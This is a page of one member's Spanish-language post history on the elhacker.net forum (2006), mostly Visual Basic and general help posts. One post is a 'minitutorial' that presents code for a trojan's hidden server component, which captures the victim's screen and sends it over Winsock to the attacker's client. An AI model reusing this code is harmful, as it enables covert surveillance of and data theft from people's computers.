elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Sigue las noticias más importantes de seguridad informática en el Twitter! de elhacker.NET


  Mostrar Mensajes
Páginas: 1 2 3 4 5 6 7 8 9 10 [11] 12 13
101  Programación / Programación Visual Basic / Re: que en un label se vean pasisiones del mouse? en: 24 Septiembre 2006, 01:02 am
Tienes razon  :P mucho mas corto, quedaria una cosa asi:

Código:
Option Explicit

Private Type POINTAPI
    X As Long
    Y As Long
End Type
Private Declare Function GetCursorPos Lib "user32" (lpPoint As POINTAPI) As Long

Private Sub Form_Load()
Timer1.Interval = 10
End Sub

Private Sub Timer1_Timer()
Dim PT As POINTAPI
    GetCursorPos PT
    Label1.Caption = PT.X & "-" & PT.Y
End Sub

Saludos y gracias  ;)
102  Programación / Programación Visual Basic / Re: Taskkill en: 22 Septiembre 2006, 16:54 pm
Pues la api concreta es la TerminateProcess del kernel32, aki te pongo un par d ejemplos que he encontrado en internet

http://www.gamarod.com.ar/trucos/cerrar_aplicacion_a_partir_del_nombre_del_exe_lista_de_tareas.asp

http://www.telecable.es/personales/jrubi/index.htm?trucos/tip00317.htm

http://vbsiglo21.net/modules.php?name=News&file=article&sid=1

Saludos
103  Programación / Programación Visual Basic / Re: que en un label se vean pasisiones del mouse? en: 22 Septiembre 2006, 16:36 pm
Wenas

A ver, pon un label y un timer. En las Declaraciones del General pones:

Código:
Option Explicit
Private Type POINTAPI
    X As Long
    Y As Long
End Type
Private Declare Function GetCursorPos Lib "user32" (lpPoint As POINTAPI) As Long
Private Declare Function ScreenToClient Lib "user32" (ByVal hWnd As Long, _
    lpPoint As POINTAPI) As Long
   
Function MouseX(Optional ByVal hWnd As Long) As Long
    Dim lpPoint As POINTAPI
    GetCursorPos lpPoint
    If hWnd Then ScreenToClient hWnd, lpPoint
    MouseX = lpPoint.X
End Function

Function MouseY(Optional ByVal hWnd As Long) As Long
    Dim lpPoint As POINTAPI
    GetCursorPos lpPoint
    If hWnd Then ScreenToClient hWnd, lpPoint
    MouseY = lpPoint.Y
End Function

Nota: este codigo fue sacado de http://www.devx.com/vb2themax/Tip/19124

Ahora en el form_load pones timer1.interval = 10, o el numero q sea, ese va a ser el intervalo de actualizacion. Y en el timer1_timer pones:

Código:
Label1.Caption = "X = " & MouseX & "  Y = " & MouseY

Y listo, ahi te saldra.

Saludos
104  Programación / Programación Visual Basic / MiniTuto: Capturar pantalla en VB en: 21 Septiembre 2006, 20:06 pm
Hola a todos.

Pues al fin me he animado a escribir mi primer minitutorial y colaborar un poquito con este magnifico foro  :). El codigo no es mio sino que lo saque de la MSDN, y lo implemente en un programita sencillo para poder explicar como funciona. Ademas al final del tuto explicare como hacerlo remotamente, ya que todo esto surgio debido a un troyanito que estoy programando y keria ponerle funcion de capturar pantalla, y claro si no es de forma remota pues de poco sirve :P.

El funcionamiento es simple: realiza la misma funcion que si pulsaramos la tecla ImprPant, y mete la captura de pantalla en el portapapeles. Despues para obtener la captura solo tenemos que pegar en cualkier editor grafico (el mismo paint sirve) y eso, lo de siempre.

Bueno menos charla y mas codigo, aki va  :P.

Código:
Option Explicit
Private Declare Sub keybd_event Lib "user32" (ByVal bVk As Byte, ByVal _
   bScan As Byte, ByVal dwFlags As Long, ByVal dwExtraInfo As Long)

Private Declare Function GetVersionExA Lib "kernel32" _
      (lpVersionInformation As OSVERSIONINFO) As Integer

Private Type OSVERSIONINFO
    dwOSVersionInfoSize As Long
    dwMajorVersion As Long
    dwMinorVersion As Long
    dwBuildNumber As Long
    dwPlatformId As Long
    szCSDVersion As String * 128
End Type

Private Const VK_SNAPSHOT = &H2C

Dim blnAboveVer4 As Boolean

Ok explico un poco: Esta es la primera parte, va en la parte de Declaraciones del General. Empieza con Option Explicit, ya saben para requerir la declaracion de todas las variables. Despues declaramos dos API's, la primera detecta (o crea, en este caso) los eventos del teclado (keybd_event); y la segunda obtiene el sistema operativo que estamos utilizando (GetVersionExA) para asegurarse de que es compatible con la funcion que queremos utilizar; y poco mas, algunos parametros que son necesarios para esto ultimo, una costante, una variable y c'est fini xD no tiene mucha ciencia esta parte. Ok, prosigamos.

Código:
Private Sub Form_Load()
Dim osinfo As OSVERSIONINFO
    Dim retvalue As Integer
   
    osinfo.dwOSVersionInfoSize = 148
    osinfo.szCSDVersion = Space$(128)
    retvalue = GetVersionExA(osinfo)
    If osinfo.dwMajorVersion > 4 Then blnAboveVer4 = True

End Sub

Bien, esto va en el Form. Se encarga de lo que ya habiamos comentado, obtiene el sistema operativo que utilizamos y comprueba que es compatible (If osinfo.dwMajorVersion > 4 Then blnAboveVer4 = True
). Simplemente comprueba que el parametro devuelto dwMajorVersion sea mayor a 4 (Cada OS tiene su valor, creo q 4 era para los Win9x, y despues las diferencias menores corren a cargo de dwMinorVersion, para mas info google). Solo es eso, para lo que pretendemos no es necesario comprender que hace exactamente cada linea de este code. Seguimos entonces; ponemos un CommandButton, que es lo unico que necesitaremos aqui, y ponemos este codigo en el evento Click():

Código:
Private Sub Command1_Click()
    If blnAboveVer4 Then
        keybd_event VK_SNAPSHOT, 0, 0, 0
    Else
        keybd_event VK_SNAPSHOT, 1, 0, 0
    End If
End Sub

Esto es lo realmente interesante, aqui se emula la pulsacion de la tecla ImprPant y se copia al Clipboard la imagen obtenida.

Pues that's all folks! Ahora ya solo keda compilar y ejecutar nuestro sencillo programa, pulsamos el boton y efectivamente comprobamos: vamos al paint, pegar y voila, captura  :)



Y ahora diran 'Pues que tonteria mas grande, no seria mas util hacerlo de forma remota?'. Si, claro que lo es :P Explicare un poco como funciona, el resto se lo dejo a ustedes para que investiguen  ;)

Veamos, para hacer esto de forma remota primero debemos crear una aplicacion cliente/servidor, como cualquier troyano; para estos menesteres usaremos Winsock. Pueden hacerlo de conexion directa o inversa, es lo de menos. En la aplicacion cliente podemos poner un CommandButton para conectar (o poner un puerto a la escucha, repito depende de como establezcamos el modo de conexion) y un label para, por ejemplo, ver el estado de la conexion (Desconectado, escuchando, conectado,...). Hacer esto no es nada dificil, hay muchos ejemplos en el foro. Tambien pondremos otro CommandButton para, cuando estemos conectados, mandemos la orden de capturar la pantalla al server (En mi caso usare ws.SendData = "scrncap", ya veran el porque). Y poco mas por aqui, lo unico a tener en cuenta es poner en el evento DataArrival del Winsock (es decir, lo que recibamos del server, que en este caso es la captura propiamente dicha) este code:

Código:
Private Sub ws_DataArrival(ByVal bytesTotal As Long)
Dim datos as String, scrn as Variant, scrn1 as Variant
ws.GetData datos
If Left(datos, 7) = "scrncap" Then
    scrn = Split(datos, "|")
    scrn1 = scrn(1)
    Clipboard.Clear
    Clipboard.SetData (scrn1)
End If
End Sub

Enseguida entenderan el porque de este code, vamonos con el server. En el server debemos declarar las API's y el codigo que vimos antes, exactamente igual, solo que deberemos añadir un par de cosas. Pondremos un Picture y un Command aki, pero como no sera visible para la victima llamaremos a su evento Click con un Call, cuando sea necesario claro. Configuramos lo necesario para crear una conexion con el cliente, en el evento DataArrival ponemos:

Código:
Private Sub ws_DataArrival(ByVal bytesTotal As Long)
Dim datos As String
ws.GetData datos

If datos = "scrncap" Then
Call Command1_Click
End If
End Sub

Asi, cuando le dabamos a nuestro Command en el cliente, este manda la cadena "scrncap", y este codigo, al detectar esta cadena llama al evento Command1_Click(), en el que pondremos el mismo code que en local mas unas cuentas cosas:

Código:
Private Sub Command1_Click()
If blnAboveVer4 Then
        keybd_event VK_SNAPSHOT, 0, 0, 0
    Else
        keybd_event VK_SNAPSHOT, 1, 0, 0
    End If
Picture1.Picture = Clipboard.GetData
ws.SendData "scrncap" & "|" & Picture1.Picture
End Sub

Ahi lo que hacemos es coger el contenido del portapapeles, en el que esta la captura, y lo copiamos al Picture que tenemos en el server. Y despues enviamos la cadena "scrncap" de nuevo, para indicar al cliente que estamos mandando la captura; el simbolo "|" y la captura en si misma. Ahora se comprende el codigo del evento DataArrival del cliente, lo pongo de nuevo:

Código:
Private Sub ws_DataArrival(ByVal bytesTotal As Long)
Dim datos as String, scrn as Variant, scrn1 as Variant
ws.GetData datos
If Left(datos, 7) = "scrncap" Then
    scrn = Split(datos, "|")
    scrn1 = scrn(1)
    Clipboard.Clear
    Clipboard.SetData (scrn1)
End If
End Sub

Detecta que los 7 primeros caracteres que recibe corresponden a "scrncap", despues con el comando Split colocamos en la variable scrn (convertida en matriz) las partes separadas con el simbolo "|", y a continuacion metemos en scrn1 lo correspondiente al segundo dato de la matriz scrn (recuerden que la primera parte es la cadena "scrncap", y que las matrices empiezan con (0)  ;D). Ahora limpiamos lo que tengamos en el portapapeles y metemos la captura que hemos obtenido con la sentencia 'Clipboard.SetData (scrn1)'. Y ya esta, vamos al paint, pegamos y si lo hemos hacho bien deberia salirnos la captura remota  :)

Hasta aqui este "minitutorial" :P Espero sus opiniones y criticas, y sobre todo que les haya servido de algo ^^

Saludos!
105  Programación / Programación Visual Basic / Re: Taskkill en: 21 Septiembre 2006, 18:47 pm
Buenas.

Que tal si pones un textbox y un command, y en el evento Command1_Click() pones:

Código:
Private Sub Command1_Click()
Shell ("cmd.exe /c " & Text1.Text)
End Sub

Asi todo lo que escribas funcionara como comandos de MS-DOS. Y para terminar un proceso pues escribes en el textbox

Código:
taskkill /f /im proceso.exe

Tal como dijo WarGhost, pero creo que te equivocaste ya q tasklist es para mostrar los procesos activos :P taskkill es el comando correcto.

Espero que te sirva, saludos.
106  Programación / Programación Visual Basic / Re: como usar winsock, si es posible, para realizar un minichat en: 20 Septiembre 2006, 00:10 am
Wenas

Echale un vistazo a este mini tutorial, esta interesante para lo que kieres hacer  :)

http://www.monografias.com/trabajos30/tutorial-visual-basic/tutorial-visual-basic.shtml

Saludos
107  Informática / Tutoriales - Documentación / Re: TUTORIAL PROGRAMACION BAT en: 29 Junio 2006, 03:58 am
Hola wenas, le he dao un repaso al post y no lo he encontrao, asi q ahi va mi dudita: como seria para redireccionar la salida de un comando a un archivo externo?

Por ejemplo hacer un batch q ejecute el comando "systeminfo" y el resultado q devuelva mandarlo a C:\algo.txt

Alguna sugerencia? Gracias d antemano

Saludos

EDIT:

Nada, ya averigüe como era, demasiado obvio...

Código:
comando > archivo.txt

Saludos  ;D ;D
108  Media / Diseño Gráfico / Re: Quiero a aprender a usar photoshop en: 25 Marzo 2006, 21:11 pm
www.good-tutorials.com

Una web muy interesante para aprender a usar Photoshop, hay una sección dedicada a dibujo, q es lo q te interesa. Eso si, necesitaras saber ingles nivel usuario para entender algo  :P

De todas formas, Photoshop no es un programa muy adecuado para lo q tu te propones. Yo en tu lugar usaria CorelDRAW o algun programa del estilo. Photoshop es mas para retokes fotograficos y efectos, pero weno todo es posible  ;D

Salu2
109  Media / Juegos y Consolas / Re: Mejor juego de la historia en: 25 Marzo 2006, 20:59 pm
jaja weno, asi cronologicamente los primeros q jugue y mas me gustaron fueron el Mario como no; el UFO: Enemy Unknown, nadie lo ha mencionado pero yo me pase incontables tardes enganchado, insuperable; Civilization el primero, y sin duda el mejor, mas tarde tb jugaba al III, tb es muy weno pero no tiene esa magia q tenia el I, realmente esta saga te hace sentir el amo del mundo, tienes q pensar y medir tus acciones, muy recomendable; mas tarde me encanto el Metal Gear Solid pa la play, tanto el 1 cmo el 2 son increibles, aunke el primero me lo pase como 6 veces :P el 3 no lo llegue a jugar; despues de ese tiempo en la play volvi a los juegos de PC con el Half Life y el Unreal Tournament (el primero), como shooter preferia mucho mas este ultimo, en multijugador se salia  ;D despues vinieron el counter y demas mods de half life pero nunca me hicieron mucha gracia; un tiempo mas tarde el juego por excelencia, Age Of Empires II: The Conquerors, es q sencillamente me inclino ante el, es estrategia en estado puro. Aunke siempre me parecio un poco frenetico, especialmente al principio de las partidas (hablo del modo multijugador), tiene una jugabilidad increible. Mas juegos q me marcaron, la saga Commandos, los jugue todos pero el q mas me gusto fue el 2, sobre todo por los escenarios. Menuas matanzas de nazis, q recuerdos... :-(. Despues de Commandos vino Grand Theft Auto, al primero q jugue fue el 3 (staba muy bien), y despues al Vice City (staba TREMENDO). Mas tarde vino el San Andreas, solo lo jugue una vez por encima y no me convencio asi q no opino, aunke a muxa gente le gusta. Yo sigo prefiriendo el Vice City; Otro juego muy destacable es el Battlefield 1942, el 2 no lo he jugado asi q no se, pero el primero y todas sus expansiones si, incluyendo Battlefield: Vietnam. Me kedo con el original:P sobre todo en multijugador ofrece posibilidades increibles, el vietnam tambien me gusto pero no se, le falta algo que solo tiene el 1942  ;D. Y no se, hay muxos mas...ah, como olvidar el Medal of Honor: Allied Assault. En el modo d un jugador no era demasiado destacable pero el multijugador era increible, muxas tardes pase yo pegando tiros con el sniper a todo dios  :)...Weno ya no se me ocurren mas, ultimamente ya no juego mucho, ni uso juegos muy actuales, mas q nada porq el PC no me lo permite :P pero pienso q siempre kedan clasicos insuperables por el camino, q bastan para ser feliz ludicamente  :D

Salu2
110  Foros Generales / Dudas Generales / Re: Cambiar el orden de inicio de dos sistemas operativos en: 9 Marzo 2006, 22:09 pm
pos el de windows...q yo sepa no tiene nombre  :( es un simple bootloader q viene x defecto con el win, no le he visto ningun nombre comercial. tal vez si tenga, no lo se

Páginas: 1 2 3 4 5 6 7 8 9 10 [11] 12 13
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines